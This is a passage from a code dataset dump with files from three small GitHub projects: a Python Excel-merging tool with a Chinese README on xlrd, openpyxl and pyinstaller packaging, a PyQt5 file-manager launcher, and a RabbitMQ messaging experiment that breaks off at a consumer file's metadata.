notfound.save(path + \"/notfound.xlsx\")\n\n except Exception as e:\n errorList.append(error(path + '/' + _fileName + \".xlsx\", \"Unexpected Error: {}\".format(e)))\n print(\"文件保存失败,请检查 \" + _fileName + \".xlsx 或 notfound.xlsx 是否在打开状态。请关闭文件后重试!!!\")\n print(\"Unexpected Error: {}\".format(e))\n\n else:\n print(\"保存文件成功,路径:\" + path + \"/\" + _fileName + \".xlsx\") \n\n# --------------------------------------------------------------------------------------------- #\n# main function #\n# --------------------------------------------------------------------------------------------- #\n\n\n#文件夹目录\npath = \"../data/\"\n#得到文件夹下的所有文件名称\nfiles= listdir(path) \n\n# mark the message throught the process\nerrorList = []\ncorrectCount = 0\nfailCount = 0\n\n# open report to write down\nreportPath = getReportPath(path, files)\nrefundPath = getReportPath(path, files, _onlyXlsx = False)\nnotfound = Workbook()\nnotfoundTable = notfound.active\ninitNotFoundTable()\n\nif reportPath is not None:\n # open the report\n summary = openReport(reportPath)\n processRefundInfo(refundPath)\n\n# init notfound table\n\n\nsave(\"output\")\n \n# pause the os in case disappear\nsystem(\"pause\")\n\n \n \n \n\n "
},
{
"alpha_fraction": 0.7123287916183472,
"alphanum_fraction": 0.7162426710128784,
"avg_line_length": 20.33333396911621,
"blob_id": "b745a991837906529b650756a3b44637ec38bfc0",
"content_id": "388e5880d55dbca19e6210cea05fc5821a8e87e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 757,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/src/main.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import command\nimport guide\nfrom log import Logger\nfrom error import ErrorList\nfrom os import system\n\n\nprint(\"欢迎使用6.0版本的本系统了(连名字都没有,哎呀我去\")\nprint(\"有不懂不要问,去命令行模式输入 do -help \")\nprint(\"汇总文件仅支持“.xlsx“格式, 退款文件仅支持”.xls“格式,出错了检查一下是不是这个问题\\n\")\n\nmode = input(\"输入点东西就进入命令行模式,啥也不输就进入引导模式:\")\n\nif mode == \"\":\n Logger.addLog(\"输入:{},进入引导模式。\".format(mode))\n guide.doGuide(\"../data\")\nelse:\n Logger.addLog(\"输入:{},进入命令模式。\".format(mode))\n command.doCommand()\n\n\nErrorList.printErrorList()\nLogger.writeLog()\nsystem(\"pause\")"
},
{
"alpha_fraction": 0.5059764981269836,
"alphanum_fraction": 0.5115293860435486,
"avg_line_length": 39.704978942871094,
"blob_id": "2566bac93374ea69370e015e9b4de43fd0a3006a",
"content_id": "bdec5c33d1c19aab662e0879744706e7bcd03aac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10833,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 261,
"path": "/src/saleAmount.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from error import processException, ErrorList, Error,Warning, NotFound\nfrom log import Logger\nimport utils\nimport xlsutils\nfrom datetime import datetime\nfrom os import path as osPath\nfrom os import listdir,system\nfrom xlrd import open_workbook\n\n\nclass info:\n def __init__(self):\n self.account = \"undefined\"\n self.name = \"undefined\"\n self.location = \"undefined\"\n self.salesAmount = 0.0\n self.profitRate = 0.0\n self.normal = True # to mark the cell is nornal or not \n\n\nclass SaleAmount: \n\n def __init__(self, _summary, _notfoundTable):\n self.__summary = _summary\n self.__notfoundTable = _notfoundTable\n self.__correctCount = 0\n self.__failCount = 0\n\n\n def processInfoWithTime(self,_lastpath):\n print(\"正在处理文件:\" + _lastpath)\n _startTime = datetime.now()\n\n try:\n _platform, _infoType, _infoList = self.__getInfoByXlrd(_lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\r文件已读取完成,用时 \" + str(_interval) + \" 秒\")\n\n # ignore writing when info list is none\n if _infoList == []:\n ErrorList.addError(Warning(_lastpath, \"读取数据为空,注意检查\"))\n print(\"读取数据为空,已跳过写入!!\")\n return \n\n _startTime = datetime.now()\n self.__setInfo(_platform, _infoType, _infoList, _lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"数据已处理完成,用时 \" + str(_interval) + \" 秒\\n\")\n\n except Exception:\n processException()\n\n\n def processDir(self, _filepath):\n files = listdir(_filepath) \n for file in files: \n filePath = _filepath + '/' + file\n if osPath.isdir(filePath): \n self.processSecondLevelDir(filePath)\n\n\n def processSecondLevelDir(self, _filepath):\n _files = listdir(_filepath) \n\n for _file in _files:\n _lastpath = _filepath + '/' + _file\n\n #判断是否是文件夹\n if osPath.isdir(_lastpath): \n # 递归搜索\n self.processSecondLevelDir(_lastpath)\n else:\n # to process each file\n \n # ignore the files which not .xlsx or .xls file\n if not (\".xls\" in _file):\n continue\n else:\n # ignore the temporary files\n if \"~$\" in _file:\n ErrorList.addError(Warning(_lastpath, \"find \\'~$\\' in the file name, do use \\'~$\\' for file name in case we see it as temporary files\"))\n continue\n \n Logger.addPrefabLog(Logger.LOG_TYPE_DO,_lastpath)\n self.processInfoWithTime(_lastpath)\n \n\n\n def __getInfoByXlrd(self, filePath):\n try:\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of \"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or utils.is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not utils.is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n _nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n\n except Exception:\n processException()\n return \"\", \"\", []\n else :\n return _platform, _infoType, _infoList\n\n\n def __processNotFoundInfo(self, _platform, _infoType, _infoInstance):\n _row = self.__notfoundTable.max_row + 1\n self.__notfoundTable[\"A\" + str(_row)] = _infoType\n self.__notfoundTable[\"B\" + str(_row)] = _platform\n self.__notfoundTable[\"C\" + str(_row)] = _infoInstance.account\n self.__notfoundTable[\"D\" + str(_row)] = _infoInstance.name\n self.__notfoundTable[\"E\" + str(_row)] = _infoInstance.name + \" \" + _infoInstance.location\n # to judge the normal is true or not\n if _infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n self.__notfoundTable[\"F\" + str(_row)].value = _infoInstance.salesAmount\n self.__notfoundTable[\"G\" + str(_row)].value = _infoInstance.profitRate\n else :\n # else write down the margin \n self.__notfoundTable[\"I\" + str(_row)].value = _infoInstance.salesAmount\n \n\n def __setInfo(self, _platform, _infoType, _infoList, _path):\n try:\n # find the infotype table\n if _infoType not in self.__summary.sheetnames:\n ErrorList.addError(Error(_path,\"can not find correct sheet: \" + _infoType))\n return \n reportTable = self.__summary[_infoType]\n\n # to find the index of platform\n index, offset = utils.findPlatformIndex(reportTable, _platform)\n if index == -1:\n ErrorList.addError(Error(_path, \"can not find correct platform: \" + _platform))\n return\n\n # for each data in infoList to write down in the report\n for infoInstance in _infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + offset):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n self.__correctCount += 1\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # write down and break the for loop\n break\n\n if isFind:\n continue\n else:\n # insert a new row\n xlsutils.insert_rows(reportTable, index + offset + 1, True)\n offset += 1\n\n # write the data\n row = index + offset\n reportTable[\"B\" + str(row)].value = _infoType\n reportTable[\"D\" + str(row)].value = infoInstance.account\n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n if infoInstance.normal :\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # set red color\n xlsutils.setColor(reportTable[\"D\" + str(row)], \"red\")\n\n self.__failCount += 1\n Logger.addLog(\"新增插入一行,插入时行号 {},账号 {}\".format(row, infoInstance.account))\n ErrorList.addError(NotFound(_path, \"存在新增数据,请自行插入,数据已录入 notfound.xlsx\"))\n self.__processNotFoundInfo(_platform, _infoType, infoInstance)\n\n \n except Exception:\n processException()\n\n \n def getFailCount(self):\n return self.__failCount\n\n def getCorrectCount(self):\n return self.__correctCount\n\n"
},
{
"alpha_fraction": 0.590298056602478,
"alphanum_fraction": 0.5929281115531921,
"avg_line_length": 25.734375,
"blob_id": "39c531a305098a0f0982f353dbd1d29b295f4c04",
"content_id": "1fe78d53876ec42a2ba30ef62a0daf5b09133c48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3542,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 128,
"path": "/src/error.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import sys\nimport linecache\nfrom log import Logger\nfrom os import system\n\n\nclass ErrorList:\n __errorList = []\n __warningList = []\n __notFoundList = []\n\n @classmethod\n def printErrorList(ErrorList):\n if len(ErrorList.__errorList) != 0 :\n print(\"\\n操作过程有以下错误:\")\n else:\n print(\"\\n恭喜!!操作过程无错误\")\n for _error in ErrorList.__errorList:\n _error.printInfo()\n\n if len(ErrorList.__warningList) != 0 :\n print(\"\\n操作过程有以下警告:\")\n else:\n print(\"\\n恭喜!!操作过程无警告\")\n for _warning in ErrorList.__warningList:\n _warning.printInfo()\n\n if len(ErrorList.__notFoundList) != 0 : print(\"\\n存在新增数据,请自行插入,数据已录入 notfound.xlsx\")\n for _notfound in ErrorList.__notFoundList:\n _notfound.printInfo()\n \n\n @classmethod\n def addError(ErrorList, _error):\n Logger.addLog(_error.toString())\n if type(_error) == Error:\n ErrorList.__errorList.append(_error)\n\n elif type(_error) == Warning:\n ErrorList.__warningList.append(_error)\n\n elif type(_error) == NotFound:\n ErrorList.__notFoundList.append(_error)\n \n @classmethod\n def getErrorCount(ErrorList):\n return len(ErrorList.__errorList)\n\n @classmethod\n def getWarningCount(ErrorList):\n return len(ErrorList.__warningList) + (1 if len(ErrorList.__notFoundList) > 0 else 0)\n\n\nclass ErrorBase:\n TYPE_ERROR = 1\n TYPE_WARNING = 2\n TYPE_NOTFOUND = 3\n\n def __init__(self,_path,_message):\n self.path = _path\n self.message = _message\n\n def printInfo(self):\n pass\n\n def toString(self):\n pass\n\n\nclass Error(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_ERROR\n ErrorBase.__init__(self, _path, _message)\n\n\n def printInfo(self):\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n def toString(self):\n string = \"ERROR: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\nclass Warning(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_WARNING\n ErrorBase.__init__(self, _path, _message)\n\n def printInfo(self):\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n def toString(self):\n string = \"WARNING: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\nclass NotFound(ErrorBase):\n def __init__(self,_path,_message):\n self.errorType = ErrorBase.TYPE_NOTFOUND\n ErrorBase.__init__(self, _path, _message)\n\n def printInfo(self):\n print(\"PATH: \" + self.path)\n \n def toString(self):\n string = \"NOTFOUND: Massage: {}\\t Path:{}\".format(self.message, self.path)\n return string\n\n\ndef processException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n\n # send error\n ErrorList.addError(Error(filename,'APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj)))\n print('APPLICATION EXCEPTION ({} LINE {} \"{}\"): {}'.format(filename, lineno, line.strip(), exc_obj))\n\n Logger.writeLog()\n\n # stop the system and exit\n system(\"pause\")\n exit() "
},
{
"alpha_fraction": 0.6317105889320374,
"alphanum_fraction": 0.6488829851150513,
"avg_line_length": 23.481632232666016,
"blob_id": "6021a0d75dd5db415e2f6d95c924787c3868e0c3",
"content_id": "03ed9becf7b7b6c18d50216d186eb7290ff5a5c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9606,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 245,
"path": "/README.md",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "# PythonDoExcel\n\n利用Python的OpenXlPy库对Excel表格进行处理\n\n> 这个程序就是一个python小白的糊弄之作啊。由于有一天我姐突然找我干excel枯燥烦闷的复制粘贴操作。做完一想,消灭这些无聊的操作不就是程序员存在的意义嘛。所以用python开干了,虽然自己就没写过python,但看网上python操作excel还不错。\n\n## 1、环境准备\n\n> 听信了网上的建议,我还是使用了anaconda软件来管理我的python环境。最后感觉还是挺舒心的。可以再软件可视化的看见自己的已安装的包。\n \n> 项目用到的库基本在python的自带的库中,包括xlrd, openpyxl\n \n> 但打包时使用pipenv进行创建虚拟环境,并使用pyinstaller来对python脚本打包成EXE文件。\n \n> 这里还是提醒一下,注意一下要用这个程序的人的电脑是32位还是64位的,来选择一下使用python的版本。一开始我没注意,使用64位的python打包了exe,在我姐32位的电脑不兼容。最后32位和64位python环境共存也没搞好,就直接把64位卸载重装32位的了,难受。(有人会告诉我一声!!!\n\n#### \n\n## 2、xlrd操作\n\n> 看了晚上的一堆建议,然后一开始使用了`openpyxl`作为`excel`文件的读取和写入数据的库。但是后面写完才发现有点坑这个`openpyxl`,读取实在是有点慢,我一个行数不多,只有三十来K的文件,竟然在调试环境读取了一分多钟,运行环境也用了四十多秒。最后实在忍不了,投入`xlrd`的怀抱。\n> \n> `xlrd`读得快,但可能内存消耗多一点,我没有仔细的比较。`openpyxl`读取较慢可能和我使用`cell`函数较多有关,导致`xml`文件多次解析。另外,`xlrd`还支持 `.xls` 和 `.xlsx` 文件,`openpyxl`仅支持`.xlsx`文件。\n\n##### \n\n- 工作表\n \n ```python\n wb = open_workbook(filePath) # 打开工作表\n wb.close() # 关闭工作表\n ```\n\n- `sheet`操作\n \n ```python\n table = data.sheets()[0] # 通过索引顺序获取\n \n table = data.sheet_by_index(sheet_indx)) # 通过索引顺序获取\n \n table = data.sheet_by_name(sheet_name) # 通过名称获取\n \n names = data.sheet_names() # 返回book中所有工作表的名字\n \n data.sheet_loaded(sheet_name or indx) # 检查某个sheet是否导入完毕\n ```\n\n- `sheet`的行操作\n \n ```python\n nrows = table.nrows # 获取该sheet中的有效行数\n \n table.row(rowx) # 返回由该行中所有的单元格对象组成的列表\n \n table.row_slice(rowx) # 返回由该列中所有的单元格对象组成的列表\n \n table.row_types(rowx, start_colx=0, end_colx=None) # 返回由该行中所有单元格的数据类型组成的列表\n \n table.row_values(rowx, start_colx=0, end_colx=None) # 返回由该行中所有单元格的数据组成的列表\n \n table.row_len(rowx) # 返回该列的有效单元格长度\n ```\n\n- `sheet`的列操作\n \n ```python\n ncols = table.ncols # 获取列表的有效列数\n \n table.col(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有的单元格对象组成的列表\n \n table.col_slice(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有的单元格对象组成的列表\n \n table.col_types(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有单元格的数据类型组成的列表\n \n table.col_values(colx, start_rowx=0, end_rowx=None) # 返回由该列中所有单元格的数据组成的列表\n ```\n\n- `sheet`单元格操作\n \n ```python\n table.cell(row,col) # 返回对应的单元格对象\n table.cell_value(row,col) # 返回对应单元格对象的值\n ```\n\n- `sheet`获取合并表格\n \n > 这个地方还是有个坑的吧,如果你在打开表格的时候不把formatting_info属性设为True的话,是获取不到合并单元格的信息的\n \n ```python\n _refundTable.merged_cells # 获取合并单元格的列表\n rs, re, cs, ce = merge # 开始行结束行,开始列结束列信息\n ```\n\n### \n\n## 3、openpyxl操作\n\n> `xlrd`和`openpyxl`的操作还是有一定的相似的。但**有一个比较明显的不同之处就是`xlrd`的行和列是由0开始的,而`openpyxl`的行和列是由1开始的。**另外,`openpyxl`也支持使用(如`A1`)这类写法。 \n> \n> 还有就是,当遇到没有内容的单元格时,`xlrd`返回的是`“”`,而`openpyxl`返回的是`none`。如果`openpyxl`在打开时不选择`dataonly = True`的模式,`openpyxl`单元格如果为公式,则会返回公式而非值。\n> \n> 这里使用`openpyxl`库作为`excel`的写入库,还是觉得他比`xlutils`和 `xlwriter`要方便挺多的。另外,在写入模式下,`openpyxl`的性能也没有他在读入模式下的那么逊色,一番操作后只需一个save`函数`即可。\n> \n> [参考博客](https://juejin.im/post/5cae014c6fb9a0686c0186df#heading-7)\n\n##### \n\n- 打开工作表\n \n ```python\n wb = load_workbook(_reportPath) # 打开工作表\n \n wb = workbook() # 创建新的工作表\n table = wb.active() # 激活默认的sheet\n \n ws1 = wb.create_sheet() #默认插在工作簿末尾\n \n ws2 = wb.create_sheet(0) # 插入在工作簿的第一个位置\n ws.title = \"New Title\" # 修改sheet的title\n ```\n\n- sheet操作\n \n ```python\n wb.get_sheet_names() # 获取所有sheet的name\n \n wb[\"New Title\"] # 获取名字为那个的sheet\n wb.get_sheet_by_name(\"New Title\") # 和上面一样,但官方似乎不建议用这种方法了\n \n wb.remove(ws1) #删除sheet\n ```\n\n- sheet行操作\n \n ```python\n table.max_row # 获取最大有效行数\n table.max_col # 获取最大有效列数\n ```\n\n- 单元格操作\n \n ```python\n cell = ws['A4'] # 获取第4行第A列的单元格\n \n ws['A4'] = 4 # 给第4行第A列的单元格赋值为4\n \n ws.cell(row=4, column=2, value=10) # 给第4行第2列的单元格赋值为10\n ws.cell(4, 2, 10) # 同上\n ```\n\n##### \n\n## 4、打包exe\n\n- #### 使用anaconda环境打包\n \n > 不太推荐在此环境下进行exe的打包。因为anaconda会将很多无关的库依赖链接进入程序,导致最后的exe文件高达几百兆的大小,极其吓人,还会在打包的过程中引发错误。但自己在这条路上遇到了一点问题,还是简单记录一下。\n \n 1. ##### 使用pip安装pyinstaller\n \n ```python\n pip install pyinstaller\n ```\n \n 2. ##### 安装完成后,使用pyinstaller命令\n \n ```python\n # @filePath 打包的python文件的路径\n # @iconPath 打包的icon的文件路径,可选\n pyinstaller -F filePath -i iconPath\n ```\n \n 还有一堆的pyinstaller的命令,建议还是百度一下吧,就不列出来了。\n \n 3. ##### 遇到一点报错了\n \n - ###### 错误一:installer maximum recursion depth exceeded\n \n 超过最大的递归深度。这很可能是由于anaconda的库依赖太过复杂导致的。因为我在使用虚拟环境打包是就没这个错误。\n \n 解决方法:打开生成的.spec文件,在文件开头添加\n \n ```python\n import sys\n sys.setrecursionlimit(1000000)\n ```\n \n .继续执行打包,但是改文件名:pyinstaller -F XXX.spec ,执行该文件。\n \n - ###### 错误二:**UnicodeDecodeError: 'utf-8' codec can't decode byte 0xce in position 110: invalid continuation byte**\n \n 修改D:\\Python34\\Lib\\site-packages\\PyInstaller\\compat.py文件中[参考](https://stackoverflow.com/questions/47692960/error-when-using-pyinstaller-unicodedecodeerror-utf-8-codec-cant-decode-byt)\n \n ```python\n out = out.decode(encoding)\n 为\n out = out.decode(encoding, errors='ignore')\n 或\n out = out.decode(encoding, \"replace\")\n ```\n \n - ###### 错误三:pyinstaller module 'win32ctypes.pywin32.win32api' has no attribute 'error\n \n - 细看这个错误,似乎是由于icon文件的copy是造成的。\n \n - google一下,发现问题有点难解决,但还是找到了不明原因的解决方案\n \n - 将你的icon文件转换成ico格式的文件,并把文件放到打包目录的根目录下,问题就好了。\n \n - ###### 问题四:pyinstaller unpack requires a buffer of 16 bytes\n \n - 这个问题有点傻,是因为我直接将jpg的icon文件直接改拓展名的方式转换为ico格式文件,pyinstaller无法识别造成的。\n \n - google搜一下在线转ico就好了,一大堆\n \n ##### \n\n- #### 使用pipenv虚拟环境打包\n \n - ###### 安装pipenv\n \n `pip install pipenv`\n \n - ###### 选一个好目录做我们的虚拟环境,然后在该目录下:\n \n `pipenv install --python 3.7`\n \n - ###### 在命令行下激活环境\n \n `pipenv shell`\n \n 输入这个命令,我们就进入到了新建的虚拟环境。如果你这时候使用命令 `pip list` 并发现里面只有很少的库,这就说明我们成功进入虚拟环境了\n \n - ###### 安装依赖的库\n \n ```python\n # 我就用到这几个了,所以就安装了这几个\n pipenv install pyinstaller\n pipenv install openpyxl\n pipenv install xlrd\n ```\n \n - ###### 把你的脚本放到这个目录下面,运行 pyinstaller,方法同前\n \n - ###### 你会发现exe小了太多了,我从三百多兆变成了六兆,你敢信\n"
}
] | 17 |
Michal-D4/filegov
|
https://github.com/Michal-D4/filegov
|
b6c2fc0ef2121aab165ea9af6b32f17f27f0645b
|
7c9fefcf393b003284ac52b1db2ed6766686054e
|
794e99877f71484c730d091cb4378f38c64a610d
|
refs/heads/master
| 2020-05-27T20:16:00.056833 | 2019-07-22T19:33:40 | 2019-07-22T19:33:40 | 188,776,123 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6256983280181885,
"alphanum_fraction": 0.6703910827636719,
"avg_line_length": 20.058822631835938,
"blob_id": "93e623d87485b513758b63caa24383e2c0b36fad",
"content_id": "93a6c213629ad4f36f5f4177fbfa6f6eba1e5be0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 17,
"path": "/pyproject.toml",
"repo_name": "Michal-D4/filegov",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"filegov\"\nversion = \"0.1.0\"\ndescription = \"Manage files to easy search with tags, authors etc.\"\nauthors = [\"Michal <[email protected]>\"]\n\n[tool.poetry.dependencies]\npython = \"^3.7\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^3.0\"\npyqt5-tools = \"^5.12\"\nradon = \"^3.0\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n"
},
{
"alpha_fraction": 0.7075645923614502,
"alphanum_fraction": 0.7103320956230164,
"avg_line_length": 21.12244987487793,
"blob_id": "920d987b2b8ddc605f4bb0dcd432f5848bace650",
"content_id": "58b54313afff7eab93e006229d9a212b9cc58855",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 49,
"path": "/run_app.py",
"repo_name": "Michal-D4/filegov",
"src_encoding": "UTF-8",
"text": "# run_app.py\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication\n\nfrom gov_files import FilesCrt\nfrom main_window import AppWindow\nfrom db_choice import DBChoice\n\n_excepthook = sys.excepthook\n\n\ndef my_exception_hook(exctype, value, traceback):\n # Print the error and traceback\n print(exctype, value, traceback)\n # Call the normal Exception hook after\n _excepthook(exctype, value, traceback)\n sys.exit(1)\n\nsys.excepthook = my_exception_hook\n\n\ndef main():\n from PyQt5.QtCore import pyqtRemoveInputHook\n\n pyqtRemoveInputHook()\n\n app = QApplication(sys.argv)\n DBChoice()\n main_window = AppWindow()\n\n _controller = FilesCrt()\n main_window.scan_files_signal.connect(_controller.on_scan_files)\n\n # when data changed on any widget\n main_window.change_data_signal.connect(_controller.on_change_data)\n\n # signal from open_dialog=dlg\n main_window.open_dialog.DB_connect_signal.connect(_controller.on_db_connection)\n\n main_window.first_open_data_base()\n\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
dartmouth-cs98/hack-a-thing-2-rabbitmq
|
https://github.com/dartmouth-cs98/hack-a-thing-2-rabbitmq
|
b47bfe4008b345d766125412f950a5db7b4de631
|
f1ffd70d8e5f7aacc45300beedf7892d3ad9ee30
|
c6fbc784cd59be9198b90360352f0d1c9441e633
|
refs/heads/master
| 2021-07-03T18:37:58.478221 | 2017-09-26T02:01:06 | 2017-09-26T02:01:06 | 104,788,626 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.796316385269165,
"alphanum_fraction": 0.796316385269165,
"avg_line_length": 107.5882339477539,
"blob_id": "372ac2c5da5a027f9d6ad162b965603020bc672c",
"content_id": "3d9524421f77fb637edd3f65747e2f133a7916ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 593,
"num_lines": 17,
"path": "/README.md",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "# Hack-a-thing Rabbitmq\n\n## Description\nI just tried to figure out how to create a messanging back-end. I messed around with the rabbitMQ tutorials and figured out the different types of exchanges and queues and how each one of them work. https://www.rabbitmq.com/getstarted.html \n\nFridge uses a task-queue. A bunch of messages are published to an exchange. Those messages remain in the exchange until a consumer is activated. The consumer is consume all the messages that is in the queue. If multiple consumers are activated, they will take turns consuming the messages in the queue. \n\nMessanger imitates a messanging backend. It uses a pub-sub type design. This is a bit different than the fridge. With the fridge, the producer created the single exchange while with messanger, each consumer creates it own exchange and attaches itself to the producer. \n\n## Responsibilities\nI originally was working with Barry on a Chrome extension. But we soon realized that there wasn't enough work for the both of us on the hack-a-thing so I split off to explore a messanging broker. \n\n## What you learned\nI learned about how a messanging broker works and what it can be used for. I created an elementary backend for a messanging back-end. \n\n## What didn't work\nWith the fridge, the producer can be running for a long time and when a consumer attached itself to the exchange, it will consume all the messages in that exchange. However, when it came to the messanger, because multiple consumers can be attached, each consumer had to create its own exchange on the fly. As a result, whenever a consumer was attached, it would only get the messages that were published after it was attached. To get around this some more complicated logic is required with storing all the previous messages and publishing them all at once whenever a new exchange is attached.\n"
},
{
"alpha_fraction": 0.6231671571731567,
"alphanum_fraction": 0.6290322542190552,
"avg_line_length": 19.66666603088379,
"blob_id": "dd6d84a3f9321f2c27032e0c81c164261255e2e5",
"content_id": "48a081e6006aa2d921f0594376ff311b48da9e5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 33,
"path": "/messanger/producer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
"text": "import pika\nimport time\nimport sys\n\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='pub-sub', exchange_type='fanout')\n\nchannel.queue_declare(queue='task-queue', durable=True)\n\n\ntry:\n counter = 0\n while True:\n line = sys.stdin.readline()\n\n message = line\n\n channel.basic_publish(exchange='pub-sub', routing_key='', body=message,\n properties=pika.BasicProperties(\n delivery_mode = 2,\n ))\n\n print('Published... {}'.format(message))\n\n time.sleep(1)\n counter += 1\n\nexcept:\n connection.close()\n"
},
{
"alpha_fraction": 0.7357142567634583,
"alphanum_fraction": 0.7357142567634583,
"avg_line_length": 20.538461685180664,
"blob_id": "55fdf34d3901d9f963c5b8ed4b98cbe3ee345221",
"content_id": "d13ff25f3d842b128822160421b8da02292c0ba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 26,
"path": "/messanger/consumer.py",
"repo_name": "dartmouth-cs98/hack-a-thing-2-rabbitmq",
"src_encoding": "UTF-8",
